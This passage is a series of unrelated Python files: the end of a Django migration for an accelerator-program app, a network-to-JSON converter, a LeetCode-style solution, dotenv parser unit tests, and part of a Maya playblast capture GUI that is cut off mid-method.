model_name='expertprofile',
name='functional_expertise',
field=models.ManyToManyField(blank=True, related_name='experts', to=settings.MPTT_SWAPPABLE_FUNCTIONALEXPERTISE_MODEL, verbose_name='Functional Expertise'),
),
migrations.AddField(
model_name='expertprofile',
name='home_program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL, verbose_name='Home Program Family'),
),
migrations.AddField(
model_name='expertprofile',
name='interest_categories',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='mentoring_specialties',
field=models.ManyToManyField(blank=True, db_table='accelerator_expert_related_mentoringspecialty', related_name='experts', to=settings.ACCELERATOR_MENTORINGSPECIALTIES_MODEL, verbose_name='Mentoring Specialties'),
),
migrations.AddField(
model_name='expertprofile',
name='primary_industry',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='experts', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Primary Industry'),
),
migrations.AddField(
model_name='expertprofile',
name='program_families',
field=models.ManyToManyField(blank=True, help_text='Which of our Program Families would you like to be involved with?', related_name='interested_expertprofile', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='expertprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expertinterest',
name='interest_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interested_experts', to=settings.ACCELERATOR_EXPERTINTERESTTYPE_MODEL),
),
migrations.AddField(
model_name='expertinterest',
name='program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interested_experts', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='expertinterest',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expert_interests', to=settings.AUTH_USER_MODEL, validators=[accelerator_abstract.models.base_expert_interest.is_expert_validator]),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='current_program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='interest_categories',
field=models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='program_families',
field=models.ManyToManyField(blank=True, help_text='Which of our Program Families would you like to be involved with?', related_name='interested_entrepreneurprofile', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='entrepreneurprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='criterion',
name='judging_round',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGROUND_MODEL),
),
migrations.AddField(
model_name='clearance',
name='program_family',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_clearances', to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL),
),
migrations.AddField(
model_name='clearance',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='clearances', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='bucketstate',
name='cycle',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='bucketstate',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='bucketstate',
name='program_role',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMROLE_MODEL),
),
migrations.AddField(
model_name='applicationtype',
name='submission_label',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPLABEL_MODEL),
),
migrations.AddField(
model_name='applicationquestion',
name='application_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL),
),
migrations.AddField(
model_name='applicationquestion',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL),
),
migrations.AddField(
model_name='applicationquestion',
name='question',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_QUESTION_MODEL),
),
migrations.AddField(
model_name='applicationpanelassignment',
name='panel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PANEL_MODEL),
),
migrations.AddField(
model_name='applicationpanelassignment',
name='scenario',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='application_assignments', to=settings.ACCELERATOR_SCENARIO_MODEL),
),
migrations.AddField(
model_name='applicationanswer',
name='application_question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONQUESTION_MODEL),
),
migrations.AddField(
model_name='application',
name='application_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL),
),
migrations.AddField(
model_name='application',
name='cycle',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='applications', to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL),
),
migrations.AddField(
model_name='application',
name='startup',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL),
),
migrations.AlterUniqueTogether(
name='userlegalcheck',
unique_together=set([('user', 'legal_check')]),
),
migrations.AlterUniqueTogether(
name='startupteammember',
unique_together=set([('startup', 'user')]),
),
migrations.AlterUniqueTogether(
name='startupstatus',
unique_together=set([('startup', 'program_startup_status')]),
),
migrations.AlterUniqueTogether(
name='startupmentortrackingrecord',
unique_together=set([('startup', 'program')]),
),
migrations.AlterUniqueTogether(
name='startupcycleinterest',
unique_together=set([('cycle', 'startup')]),
),
migrations.AlterUniqueTogether(
name='siteprogramauthorization',
unique_together=set([('site', 'program')]),
),
migrations.AlterUniqueTogether(
name='scenariopreference',
unique_together=set([('scenario', 'priority', 'entity_type')]),
),
migrations.AlterUniqueTogether(
name='scenariojudge',
unique_together=set([('scenario', 'judge')]),
),
migrations.AlterUniqueTogether(
name='scenarioapplication',
unique_together=set([('scenario', 'application')]),
),
migrations.AlterUniqueTogether(
name='refundcoderedemption',
unique_together=set([('startup', 'refund_code', 'cycle')]),
),
migrations.AlterUniqueTogether(
name='programstartupattribute',
unique_together=set([('program', 'attribute_label')]),
),
migrations.AlterUniqueTogether(
name='programrolegrant',
unique_together=set([('person', 'program_role')]),
),
migrations.AlterUniqueTogether(
name='programfamilylocation',
unique_together=set([('program_family', 'location')]),
),
migrations.AlterUniqueTogether(
name='partnerteammember',
unique_together=set([('partner', 'team_member')]),
),
migrations.AlterUniqueTogether(
name='navtreeitem',
unique_together=set([('tree', 'title', 'url')]),
),
migrations.AlterUniqueTogether(
name='mentorprogramofficehour',
unique_together=set([('program', 'mentor', 'start_date_time')]),
),
migrations.AlterUniqueTogether(
name='judginground',
unique_together=set([('program', 'name')]),
),
migrations.AlterUniqueTogether(
name='judgeroundcommitment',
unique_together=set([('judge', 'judging_round')]),
),
migrations.AlterUniqueTogether(
name='judgepanelassignment',
unique_together=set([('judge', 'panel', 'scenario')]),
),
migrations.AlterUniqueTogether(
name='judgefeedbackcomponent',
unique_together=set([('judge_feedback', 'feedback_element')]),
),
migrations.AlterIndexTogether(
name='judgefeedbackcomponent',
index_together=set([('id', 'judge_feedback', 'feedback_element')]),
),
migrations.AlterUniqueTogether(
name='judgeavailability',
unique_together=set([('commitment', 'panel_location', 'panel_time', 'panel_type')]),
),
migrations.AlterUniqueTogether(
name='judgeapplicationfeedback',
unique_together=set([('application', 'judge', 'panel')]),
),
migrations.AlterUniqueTogether(
name='clearance',
unique_together=set([('user', 'program_family')]),
),
migrations.AlterUniqueTogether(
name='applicationpanelassignment',
unique_together=set([('application', 'panel', 'scenario')]),
),
migrations.AddField(
model_name='allocator',
name='scenario',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL),
),
]
|
import sys
import re
import json

# Convert a tab-separated node file and interaction file into a network
# JSON document ({"nodes": [...], "links": [...]}), a shape suitable for
# e.g. D3 force-directed layouts. Lines starting with '#' are treated as
# comments in both inputs.
interaction_f = sys.argv[1]
node_f = sys.argv[2]
# Optional output prefix; currently unused (the output path is
# hard-coded below).
prefix = sys.argv[3] if len(sys.argv) > 3 else None

NetJson = {'nodes': [], 'links': []}
node = {}  # node name -> index into NetJson['nodes']

# Node file columns: name, size, group.
no = open(node_f, 'r')
i = 0
for l in no:
    if re.search('^#', l):
        continue
    lc = l.strip('\n').split('\t')
    NetJson['nodes'].append({'name': lc[0],
                             'size': int(lc[1]),
                             'group': int(lc[2])})
    node[lc[0]] = i
    i += 1
no.close()

# Interaction file columns: source name, target name, value.
inter = open(interaction_f, 'r')
for l in inter:
    if re.search('^#', l):
        continue
    lc = l.strip('\n').split('\t')
    NetJson['links'].append({'source': node[lc[0]],
                             'target': node[lc[1]],
                             'value': int(lc[2])})
inter.close()

encodedjson = json.dumps(NetJson, indent=4)
fout = open('./sn.json', 'w')
print >>fout, encodedjson
fout.close()
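
# Example invocation (the script name, file names, and values below are
# illustrative placeholders, not taken from the original source):
#
#   $ python make_network_json.py interactions.txt nodes.txt myprefix
#
#   nodes.txt (name<TAB>size<TAB>group):   interactions.txt (src<TAB>dst<TAB>value):
#       geneA   10  1                          geneA   geneB   3
#       geneB   7   2                          geneB   geneC   1
#
# The result is written to ./sn.json with a "nodes" array and a "links"
# array whose source/target fields index into "nodes".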
|
class Solution(object):
    def singleNumber(self, nums):
        """
        :type nums: List[int]
        :rtype: List[int]
        """
        # Every value appears exactly twice except for two singles.
        # A value's first occurrence removes it from s1 (so s1 always
        # ends up empty) and its second occurrence removes it from s2.
        # The two singles are never removed from s2 and survive there.
        s1 = set(nums)
        s2 = set(nums)
        for num in nums:
            if num in s1:
                s1.remove(num)
            elif num in s2:
                s2.remove(num)
        res = s1 if s1 else s2
        return list(res)

if __name__ == '__main__':
    nums = [1, 2, 1, 3, 2, 5]
    print Solution().singleNumber(nums)
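
# For reference, a hedged constant-space alternative (not part of the
# original solution): XOR all numbers; the two unique values differ at
# the lowest set bit of the combined XOR, so XOR-ing each partition
# separately isolates one unique value per group.
def single_number_xor(nums):
    xor_all = 0
    for num in nums:
        xor_all ^= num
    lowest_bit = xor_all & -xor_all  # lowest bit where the two uniques differ
    a = b = 0
    for num in nums:
        if num & lowest_bit:
            a ^= num
        else:
            b ^= num
    return [a, b]  # e.g. [3, 5] for the sample input above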
|
import unittest
from mygrations.helpers.dotenv import dotenv, DotEnvSyntaxError
import io
import tempfile
class DotEnvTest(unittest.TestCase):
dotenv = None
test_string = 'test string'
def setUp(self):
self.dotenv = dotenv()
# get_contents should accept a number of parameters.
# It should accept a stringIO wrapper
def test_get_contents_stringIO(self):
self.assertEquals(self.test_string, self.dotenv.get_contents(io.StringIO(self.test_string)))
# it should also accept an actual string
def test_get_contents_string(self):
self.assertEquals(self.test_string, self.dotenv.get_contents(self.test_string))
# as well as a more general file pointer
def test_get_contents_fp(self):
fp = tempfile.TemporaryFile()
fp.write(self.test_string.encode(encoding='UTF-8'))
fp.seek(0)
self.assertEquals(self.test_string, self.dotenv.get_contents(fp))
fp.close()
# it should also accept a filename
def test_get_contents_filename(self):
filename = '%s/unit_mygrations_dotenv' % tempfile.gettempdir()
fp = open(filename, 'w')
fp.write(self.test_string)
fp.close()
self.assertEquals(self.test_string, self.dotenv.get_contents(filename))
def test_json(self):
# it should detect json and parse it as such
parsed = self.dotenv.parse('{ "key": "value",\n "name": "bob" }')
self.assertEquals({'key': 'value', 'name': 'bob'}, parsed)
def test_dont_interrupt_syntax_error(self):
# a syntax error from parse_line should not be stopped
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse, 'name')
def test_parse_each_line(self):
# otherwise each line should be parsed
parsed = self.dotenv.parse('key = value\nname = bob #sup')
self.assertEquals({'key': 'value', 'name': 'bob'}, parsed)
def test_parse_skip_empty(self):
# some whitespace checks and a few parts just because
parsed = self.dotenv.parse('key = value\n\n\n\n name = "bob" # sup\n another = "test\\"value"#okay')
self.assertEquals({'key': 'value', 'name': 'bob', 'another': 'test"value'}, parsed)
def test_opening_comment(self):
self.assertEquals([False, False], self.dotenv.parse_line('# name = test', '#'))
def test_opening_comment_with_space(self):
# white space is stripped first, so it still starts with a comment if it has spaces
self.assertEquals([False, False], self.dotenv.parse_line(' # name = test', '#'))
    def test_any_comment_character(self):
# our comment character should be respected
self.assertEquals([False, False], self.dotenv.parse_line('; name = test', ';'))
def test_multi_character_comment(self):
# and it is allowed to be more than one character long
self.assertEquals([False, False], self.dotenv.parse_line('weirdcomment name = test', 'weirdcomment'))
def test_ignore_empty_lines(self):
# empty lines (which includes lines with all white space) are ignored
self.assertEquals([False, False], self.dotenv.parse_line(' ', '#'))
def test_invalid_format(self):
# supported format is something like name = value or name: value
# if neither of the separators is present then we should get a syntax error
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'sup', '#')
def test_empty_value_equal(self):
# empty values are allowed
self.assertEquals(['key', ''], self.dotenv.parse_line('key=', '#'))
def test_empty_value_colon(self):
# colons act exactly the same way
self.assertEquals(['key', ''], self.dotenv.parse_line('key:', '#'))
def test_empty_value_equal_spaces(self):
# and spaces are ignored
self.assertEquals(['key', ''], self.dotenv.parse_line(" key \t=\t ", '#'))
    def test_empty_value_colon_spaces(self):
# and spaces are ignored
self.assertEquals(['key', ''], self.dotenv.parse_line(" key \t:\t ", '#'))
def test_value_no_quotes_equal(self):
# a value without quotes should be easy
self.assertEquals(['key', 'asdf'], self.dotenv.parse_line("key=asdf", '#'))
def test_value_no_quotes_colon(self):
# a value without quotes should be easy
self.assertEquals(['key', 'asdf'], self.dotenv.parse_line("key:asdf", '#'))
def test_value_no_quotes_equal_spaces(self):
# spaces are still ignored at the beginning/end of a part
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key= asdf bob \t", '#'))
def test_value_no_quotes_equal_colon(self):
# spaces are still ignored at the beginning/end of a part
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key : asdf bob \t", '#'))
def test_value_no_quotes_equal_comment(self):
# and comments at the end are ignored (including spaces before comments)
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key = asdf bob \t# a comment", '#'))
    def test_value_no_quotes_colon_comment(self):
# and comments at the end are ignored (including spaces before comments)
self.assertEquals(['key', 'asdf bob'], self.dotenv.parse_line("key : asdf bob \t; a comment", ';'))
def test_no_lone_quotes_double(self):
# a quote character inside the value by itself is invalid
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'name = valu"e', '#')
def test_no_lone_quotes_single(self):
# a quote character inside the value by itself is invalid
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, "name = valu'e", '#')
def test_empty_single(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line("db = ''", '#'))
def test_empty_double(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line('db = ""', '#'))
def test_empty_single_comment(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line("db = '' # database name", '#'))
def test_empty_double_comment(self):
# easy
self.assertEquals(['db', ''], self.dotenv.parse_line('db = "" ; database name', ';'))
def test_single_quotes(self):
# I shouldn't get the quotes back. Also white space should
# be ignored still
self.assertEquals(['db', 'dijere'], self.dotenv.parse_line("db = 'dijere' ", '#'))
def test_double_quotes(self):
# I shouldn't get the quotes back. Also white space should
# be ignored still
self.assertEquals(['db', 'dijere'], self.dotenv.parse_line('db = "dijere" ', '#'))
def test_no_closing_quote_single(self):
# syntax error if we have an opening quote with no close
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, "name = 'test", '#')
def test_no_closing_quote_double(self):
# syntax error if we have an opening quote with no close
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'name = "test', '#')
def test_double_quotes_with_comment(self):
# comments after the quotes should be ignored (along with whitespace)
self.assertEquals(['db', 'bob'], self.dotenv.parse_line('db = "bob" ; database name', ';'))
def test_single_quotes_with_comment(self):
# comments after the quotes should be ignored (along with whitespace)
self.assertEquals(['db', 'bob'], self.dotenv.parse_line("db = 'bob' \t# database name", '#'))
def test_text_outside_of_double(self):
# anything outside of the quotes and before a comment results in a syntax error
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, 'name = "test" sup # hey', '#')
def test_text_outside_of_single(self):
# anything outside of the quotes and before a comment results in a syntax error
self.assertRaises(DotEnvSyntaxError, self.dotenv.parse_line, "name = 'test' sup ; hey", ';')
def test_allow_ending_semicolon(self):
# anything outside of the quotes and before a comment results in a syntax error
        # except that ending the line with a semicolon is allowed.
self.assertEquals(['name', 'test'], self.dotenv.parse_line("name = 'test';", '#'))
def test_escaped_single_quote(self):
# quotes can be escaped inside quotes
self.assertEquals(['db', "asdf'qwerty'"], self.dotenv.parse_line("db = 'asdf\\'qwerty\\''", '#'))
def test_escaped_double_quote(self):
# quotes can be escaped inside quotes
self.assertEquals(['db', 'asdf"qwerty"'], self.dotenv.parse_line('db = "asdf\\"qwerty\\""', '#'))
def test_preserve_other_slashes(self):
# other slashes are left alone
self.assertEquals(['db', 'asdf\\bob'], self.dotenv.parse_line('db = "asdf\\bob"', '#'))
def test_double_quote_in_single_quote(self):
# double quote inside single quotes are just regular characters
self.assertEquals(['db', 'asdf"bob'], self.dotenv.parse_line("db = 'asdf\"bob'", '#'))
def test_single_quote_in_double_quote(self):
# single quote inside double quotes are just regular characters
self.assertEquals(['db', "asdf'bob"], self.dotenv.parse_line('db = "asdf\'bob"', '#'))
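
# Allow the suite to be run directly as a script.
if __name__ == '__main__':
    unittest.main()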
|
import json
import logging
import os
import tempfile
import capture
import maya.cmds as cmds
from .vendor.Qt import QtCore, QtWidgets, QtGui
from . import lib
from . import plugin
from . import presets
from . import version
from . import tokens
from .accordion import AccordionWidget
log = logging.getLogger("Capture Gui")
class ClickLabel(QtWidgets.QLabel):
"""A QLabel that emits a clicked signal when clicked upon."""
clicked = QtCore.Signal()
def mouseReleaseEvent(self, event):
self.clicked.emit()
return super(ClickLabel, self).mouseReleaseEvent(event)
class PreviewWidget(QtWidgets.QWidget):
"""The playblast image preview widget.
Upon refresh it will retrieve the options through the function set as
`options_getter` and make a call to `capture.capture()` for a single
frame (playblasted) snapshot. The result is displayed as image.
"""
preview_width = 320
preview_height = 180
def __init__(self, options_getter, validator, parent=None):
QtWidgets.QWidget.__init__(self, parent=parent)
# Add attributes
self.options_getter = options_getter
self.validator = validator
self.preview = ClickLabel()
self.preview.setFixedWidth(self.preview_width)
self.preview.setFixedHeight(self.preview_height)
tip = "Click to force a refresh"
self.preview.setToolTip(tip)
self.preview.setStatusTip(tip)
# region Build
self.layout = QtWidgets.QVBoxLayout()
self.layout.setAlignment(QtCore.Qt.AlignHCenter)
self.layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.layout)
self.layout.addWidget(self.preview)
# endregion Build
# Connect widgets to functions
self.preview.clicked.connect(self.refresh)
def refresh(self):
"""Refresh the playblast preview"""
frame = cmds.currentTime(query=True)
# When playblasting outside of an undo queue it seems that undoing
# actually triggers a reset to frame 0. As such we sneak in the current
# time into the undo queue to enforce correct undoing.
cmds.currentTime(frame, update=True)
# check if plugin outputs are correct
valid = self.validator()
if not valid:
return
with lib.no_undo():
options = self.options_getter()
tempdir = tempfile.mkdtemp()
# override settings that are constants for the preview
options = options.copy()
options['filename'] = None
options['complete_filename'] = os.path.join(tempdir, "temp.jpg")
options['width'] = self.preview_width
options['height'] = self.preview_height
options['viewer'] = False
options['frame'] = frame
options['off_screen'] = True
options['format'] = "image"
options['compression'] = "jpg"
options['sound'] = None
fname = capture.capture(**options)
if not fname:
log.warning("Preview failed")
return
image = QtGui.QPixmap(fname)
self.preview.setPixmap(image)
os.remove(fname)
def showEvent(self, event):
"""Initialize when shown"""
self.refresh()
event.accept()
class PresetWidget(QtWidgets.QWidget):
"""Preset Widget
Allows the user to set preferences and create presets to load before
capturing.
"""
preset_loaded = QtCore.Signal(dict)
config_opened = QtCore.Signal()
id = "Presets"
label = "Presets"
def __init__(self, inputs_getter, parent=None):
QtWidgets.QWidget.__init__(self, parent=parent)
self.inputs_getter = inputs_getter
layout = QtWidgets.QHBoxLayout(self)
layout.setAlignment(QtCore.Qt.AlignCenter)
layout.setContentsMargins(0, 0, 0, 0)
presets = QtWidgets.QComboBox()
presets.setFixedWidth(220)
presets.addItem("*")
# Icons
icon_path = os.path.join(os.path.dirname(__file__), "resources")
save_icon = os.path.join(icon_path, "save.png")
load_icon = os.path.join(icon_path, "import.png")
config_icon = os.path.join(icon_path, "config.png")
# Create buttons
save = QtWidgets.QPushButton()
save.setIcon(QtGui.QIcon(save_icon))
save.setFixedWidth(30)
save.setToolTip("Save Preset")
save.setStatusTip("Save Preset")
load = QtWidgets.QPushButton()
load.setIcon(QtGui.QIcon(load_icon))
load.setFixedWidth(30)
load.setToolTip("Load Preset")
load.setStatusTip("Load Preset")
config = QtWidgets.QPushButton()
config.setIcon(QtGui.QIcon(config_icon))
config.setFixedWidth(30)
config.setToolTip("Preset configuration")
config.setStatusTip("Preset configuration")
layout.addWidget(presets)
layout.addWidget(save)
layout.addWidget(load)
layout.addWidget(config)
# Make available for all methods
self.presets = presets
self.config = config
self.load = load
self.save = save
# Signals
self.save.clicked.connect(self.on_save_preset)
self.load.clicked.connect(self.import_preset)
self.config.clicked.connect(self.config_opened)
self.presets.currentIndexChanged.connect(self.load_active_preset)
self._process_presets()
def _process_presets(self):
"""Adds all preset files from preset paths to the Preset widget.
Returns:
None
"""
for presetfile in presets.discover():
self.add_preset(presetfile)
def import_preset(self):
"""Load preset files to override output values"""
path = self._default_browse_path()
filters = "Text file (*.json)"
dialog = QtWidgets.QFileDialog
filename, _ = dialog.getOpenFileName(self, "Open preference file",
path, filters)
if not filename:
return
# create new entry in combobox
self.add_preset(filename)
# read file
return self.load_active_preset()
def load_active_preset(self):
"""Load the active preset.
Returns:
dict: The preset inputs.
"""
current_index = self.presets.currentIndex()
filename = self.presets.itemData(current_index)
if not filename:
return {}
preset = lib.load_json(filename)
# Emit preset load signal
log.debug("Emitting preset_loaded: {0}".format(filename))
self.preset_loaded.emit(preset)
# Ensure we preserve the index after loading the changes
# for all the plugin widgets
self.presets.blockSignals(True)
self.presets.setCurrentIndex(current_index)
self.presets.blockSignals(False)
return preset
def add_preset(self, filename):
"""Add the filename to the preset list.
This also sets the index to the filename.
Returns:
None
"""
filename = os.path.normpath(filename)
if not os.path.exists(filename):
log.warning("Preset file does not exist: {0}".format(filename))
return
label = os.path.splitext(os.path.basename(filename))[0]
item_count = self.presets.count()
paths = [self.presets.itemData(i) for i in range(item_count)]
if filename in paths:
log.info("Preset is already in the "
"presets list: {0}".format(filename))
item_index = paths.index(filename)
else:
self.presets.addItem(label, userData=filename)
item_index = item_count
self.presets.blockSignals(True)
self.presets.setCurrentIndex(item_index)
self.presets.blockSignals(False)
return item_index
def _default_browse_path(self):
"""Return the current browse path for save/load preset.
If a preset is currently loaded it will use that specific path
otherwise it will go to the last registered preset path.
Returns:
str: Path to use as default browse location.
"""
current_index = self.presets.currentIndex()
path = self.presets.itemData(current_index)
if not path:
# Fallback to last registered preset path
paths = presets.preset_paths()
if paths:
path = paths[-1]
return path
def save_preset(self, inputs):
"""Save inputs to a file"""
path = self._default_browse_path()
filters = "Text file (*.json)"
filename, _ = QtWidgets.QFileDialog.getSaveFileName(self,
"Save preferences",
path,
filters)
if not filename:
return
with open(filename, "w") as f:
json.dump(inputs, f, sort_keys=True,
indent=4, separators=(',', ': '))
self.add_preset(filename)
return filename
def get_presets(self):
"""Return all currently listed presets"""
configurations = [self.presets.itemText(i) for
i in range(self.presets.count())]
return configurations
def on_save_preset(self):
"""Save the inputs of all the plugins in a preset."""
inputs = self.inputs_getter(as_preset=True)
self.save_preset(inputs)
def apply_inputs(self, settings):
path = settings.get("selected", None)
index = self.presets.findData(path)
if index == -1:
# If the last loaded preset still exists but wasn't on the
# "discovered preset paths" then add it.
            if path and os.path.exists(path):
log.info("Adding previously selected preset explicitly: %s",
path)
self.add_preset(path)
return
else:
log.warning("Previously selected preset is not available: %s",
path)
index = 0
self.presets.setCurrentIndex(index)
def get_inputs(self, as_preset=False):
if as_preset:
# Don't save the current preset into the preset because
# that would just be recursive and make no sense
return {}
else:
current_index = self.presets.currentIndex()
selected = self.presets.itemData(current_index)
return {"selected": selected}
class App(QtWidgets.QWidget):
"""The main application in which the widgets are placed"""
# Signals
options_changed = QtCore.Signal(dict)
playblast_start = QtCore.Signal(dict)
playblast_finished = QtCore.Signal(dict)
viewer_start = QtCore.Signal(dict)
# Attributes
object_name = "CaptureGUI"
application_sections = ["config", "app"]
def __init__(self, title, parent=None):
QtWidgets.QWidget.__init__(self, parent=parent)
# Settings
# Remove pointer for memory when closed
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.settingfile = self._ensure_config_exist()
self.plugins = {"app": list(),
"config": list()}
self._config_dialog = None
self._build_configuration_dialog()
# region Set Attributes
title_version = "{} v{}".format(title, version.version)
self.setObjectName(self.object_name)
self.setWindowTitle(title_version)
self.setMinimumWidth(380)
# Set dialog window flags so the widget can be correctly parented
# to Maya main window
self.setWindowFlags(self.windowFlags() | QtCore.Qt.Dialog)
self.setProperty("saveWindowPref", True)
# endregion Set Attributes
self.layout = QtWidgets.QVBoxLayout()
self.layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.layout)
# Add accordion widget (Maya attribute editor style)
self.widgetlibrary = AccordionWidget(self)
self.widgetlibrary.setRolloutStyle(AccordionWidget.Maya)
# Add separate widgets
self.widgetlibrary.addItem("Preview",
PreviewWidget(self.get_outputs,
self.validate,
parent=self),
collapsed=True)
self.presetwidget = PresetWidget(inputs_getter=self.get_inputs,
parent=self)
self.widgetlibrary.addItem("Presets", self.presetwidget)
# add plug-in widgets
for widget in plugin.discover():
self.add_plugin(widget)
self.layout.addWidget(self.widgetlibrary)
# add standard buttons
self.apply_button = QtWidgets.QPushButton("Capture")
self.layout.addWidget(self.apply_button)
# default actions
self.apply_button.clicked.connect(self.apply)
# signals and slots
self.presetwidget.config_opened.connect(self.show_config)
self.presetwidget.preset_loaded.connect(self.apply_inputs)
self.apply_inputs(self._read_widget_configuration())
def apply(self):
"""Run capture action with current settings"""
valid = self.validate()
if not valid:
return
options = self.get_outputs()
filename = options.get("filename", None)
self.playblast_start.emit(options)
# The filename can be `None` when the
# playblast will *not* be saved.
if filename is not None:
# Format the tokens in the filename
filename = tokens.format_tokens(filename, options)
# expand environment variables
filename = os.path.expandvars(filename)
# Make relative paths absolute to the "images" file rule by default
if not os.path.isabs(filename):
root = lib.get_project_rule("images")
filename = os.path.join(root, filename)
# normalize (to remove double slashes and alike)
filename = os.path.normpath(filename)
options["filename"] = filename
# Perform capture and store returned filename with extension
options["filename"] = lib.capture_scene(options)
self.playblast_finished.emit(options)
filename = options["filename"] # get filename after callbacks
# Show viewer
viewer = options.get("viewer", False)
if viewer:
if filename and os.path.exists(filename):
self.viewer_start.emit(options)
lib.open_file(filename)
else:
raise RuntimeError("Can't open playblast because file "
"doesn't exist: {0}".format(filename))
return filename
def apply_inputs(self, inputs):
"""Apply all the settings of the widgets.
Arguments:
inputs (dict): input values per plug-in widget
Returns:
None
"""
if not inputs:
return
widgets = self._get_plugin_widgets()
widgets.append(self.presetwidget)
for widget in widgets:
widget_inputs = inputs.get(widget.id, None)
if not widget_inputs:
continue
widget.apply_inputs(widget_inputs)
def show_config(self):
"""Show the advanced configuration"""
# calculate center of main widget
geometry = self.geometry()
self._config_dialog.move(QtCore.QPoint(geometry.x()+30,
geometry.y()))
self._config_dialog.show()
def add_plugin(self, plugin):
"""Add an options widget plug-in to the UI"""
if plugin.section not in self.application_sections:
log.warning("{}'s section is invalid: "
"{}".format(plugin.label, plugin.section))
return
widget = plugin(parent=self)
widget.initialize()
widget.options_changed.connect(self.on_widget_settings_changed)
self.playblast_finished.connect(widget.on_playblast_finished)
# Add to plug-ins in its section
self.plugins[widget.section].append(widget)
# Implement additional settings depending on section
if widget.section == "app":
if not widget.hidden:
item = self.widgetlibrary.addItem(widget.label, widget)
# connect label change behaviour
widget.label_changed.connect(item.setTitle)
# Add the plugin in a QGroupBox to the configuration dialog
if widget.section == "config":
layout = self._config_dialog.layout()
# create group box
group_widget = QtWidgets.QGroupBox(widget.label)
group_layout = QtWidgets.QVBoxLayout(group_widget)
group_layout.addWidget(widget)
layout.addWidget(group_widget)
def validate(self):
"""Validate whether the outputs of the widgets are good.
Returns:
bool: Whether it's valid to capture the current settings.
"""
errors = list()
for widget in self._get_plugin_widgets():
widget_errors = widget.validate()
if widget_errors:
errors.extend(widget_errors)
if errors:
message_title = "%s Validation Error(s)" % len(errors)
message = "\n".join(errors)
QtWidgets.QMessageBox.critical(self,
message_title,
message,
QtWidgets.QMessageBox.Ok)
return False
return True
def get_outputs(self):
"""Return settings for a capture as currently set in the Application.
Returns:
dict: Current output settings
"""
# Get settings from widgets
outputs = dict()
for widget in self._get_plugin_widgets():
